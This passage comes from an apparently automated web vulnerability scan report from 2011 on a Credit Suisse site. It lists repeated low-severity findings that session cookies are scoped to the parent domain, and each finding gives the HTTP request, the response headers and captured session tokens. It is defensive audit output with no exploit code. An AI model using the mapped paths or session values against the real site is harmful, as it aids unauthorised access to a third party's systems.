Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:34:47 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:34:48 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:34:48 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.14. https://infocus.credit-suisse.com/app/_return/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/_return/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_return/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:52 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:38:52 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:38:52 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.15. https://infocus.credit-suisse.com/app/article/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/article/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:34:40 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:40 GMT
location: /?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:34:40 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.16. https://infocus.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:34:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:33 GMT
location: /?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:34:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.17. https://infocus.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index3.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/index3.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:29 GMT
expires: Mon, 19 Sep 2011 15:38:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


   <script language="JavaScript" type="text/javascript">
   <!--
       if(window.opener == undefined){
           location.href = "https://infocus.credit-suisse.com";
       }else{
           window.close();
       }
   //-->

...[SNIP]...

3.18. https://infocus.credit-suisse.com/app/error/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/error/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/error/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:04 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:35:05 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:35:05 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.19. https://infocus.credit-suisse.com/app/error/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/error/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/error/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:39:39 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:39:40 GMT
location: /app/_error/error.cfm?CFID=38647286&CFTOKEN=9932378849fbeda01587b81cbfc3d766
expires: Mon, 19 Sep 2011 15:39:40 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38647286; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=9932378849fbeda01587b81cbfc3d766; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.20. https://infocus.credit-suisse.com/app/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:08 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:09 GMT
location: /index.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:35:09 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.21. https://infocus.credit-suisse.com/app/legal/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/legal/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/legal/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:49 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:46:50 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:46:50 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.22. https://infocus.credit-suisse.com/app/newsletter/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/newsletter/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:33 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:34 GMT
location: /index.cfm?fuseaction=OpenNewsletter&CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:38:34 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.23. https://infocus.credit-suisse.com/app/newsletter/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:33 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
location: /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&l
Connection: close
Content-Type: text/html; charset=UTF-8


3.24. https://infocus.credit-suisse.com/app/print/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/print/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/print/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:07 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:08 GMT
expires: Mon, 19 Sep 2011 15:35:08 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

3.25. https://infocus.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/print/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:33 GMT
expires: Mon, 19 Sep 2011 15:38:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

3.26. https://infocus.credit-suisse.com/app/rss/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/rss/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:35 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:38:36 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:38:36 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.27. https://infocus.credit-suisse.com/app/rss/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:38 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

3.28. https://infocus.credit-suisse.com/app/sendpage/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sendpage/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:02 GMT
expires: Mon, 19 Sep 2011 15:35:02 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

3.29. https://infocus.credit-suisse.com/app/sendpage/act_sendto.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/act_sendto.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sendpage/act_sendto.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:41 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:42 GMT
location: index.cfm?fuseaction=OpenSendPage&=&formerror=true&refresh=true
expires: Mon, 19 Sep 2011 15:46:42 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.30. https://infocus.credit-suisse.com/app/sendpage/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sendpage/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:33 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:33 GMT
expires: Mon, 19 Sep 2011 15:38:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

3.31. https://infocus.credit-suisse.com/app/shop/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/shop/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/shop/index.cfm?fuseaction=OpenShopDetail&aoid=317249 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/_return/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
location: https://publications.credit-suisse.com/app/shop/index.cfm?fuseaction=OpenShopDetail&aoid=317249
expires: {ts '2011-09-19 16:38:37'}
Content-Language: en-US
cache-control: public, no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.32. https://infocus.credit-suisse.com/app/sitemap/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/sitemap/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sitemap/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:08 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:09 GMT
location: /
expires: Mon, 19 Sep 2011 15:35:09 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.33. https://infocus.credit-suisse.com/app/stat/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/stat/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/stat/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:04 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:04 GMT
location: /
expires: Mon, 19 Sep 2011 15:35:04 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.34. https://infocus.credit-suisse.com/app/topic/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/topic/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:51 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:52 GMT
location: /
expires: Mon, 19 Sep 2011 15:46:52 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.35. https://infocus.credit-suisse.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/
